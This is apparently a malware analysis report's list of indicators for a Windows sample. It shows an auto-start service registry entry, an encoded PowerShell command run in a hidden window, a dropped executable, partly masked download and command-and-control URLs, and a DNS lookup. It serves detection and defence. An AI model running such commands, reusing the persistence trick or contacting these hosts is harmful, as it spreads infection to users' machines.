Technical information
- [<HKLM>\System\CurrentControlSet\Services\whichwhich] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\whichwhich] 'ImagePath' = '"%WINDIR%\SysWOW64\whichwhich.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAGoAZwByAHYAZgBqAGQAagA9ACcAVQBpAGcAdQBiAGkAbABiAGYAbABhACcAOwAkAEUAdwB5AHAAbQBtAHYAaQBhAGYAZAB0AGMAIAA9ACAAJwA2ADIANAAnADsAJABHAGkAcgB5AGEAZABuAHkAagBqAHoAPQAnAEMAcgB2AHQAcABqAHgAcgA...
- %HOMEPATH%\624.exe
- %HOMEPATH%\624.exe to %WINDIR%\syswow64\whichwhich.exe
- http://ac####y.seongon.com/wp-content/4h2x11317/
- http://18#.##3.113.67:443/iplk/taskbar/ringin/merge/ via 18#.#73.113.67
- DNS ASK ac####y.seongon.com
- '%HOMEPATH%\624.exe'
- '%WINDIR%\syswow64\whichwhich.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAGoAZwByAHYAZgBqAGQAagA9ACcAVQBpAGcAdQBiAGkAbABiAGYAbABhACcAOwAkAEUAdwB5AHAAbQBtAHYAaQBhAGYAZAB0AGMAIAA9ACAAJwA2ADIANAAnADsAJABHAGkAcgB5AGEAZABuAHkAagBqAHoAPQAnAEMAcgB2AHQAcABqAHgAcgA...' (with a hidden window)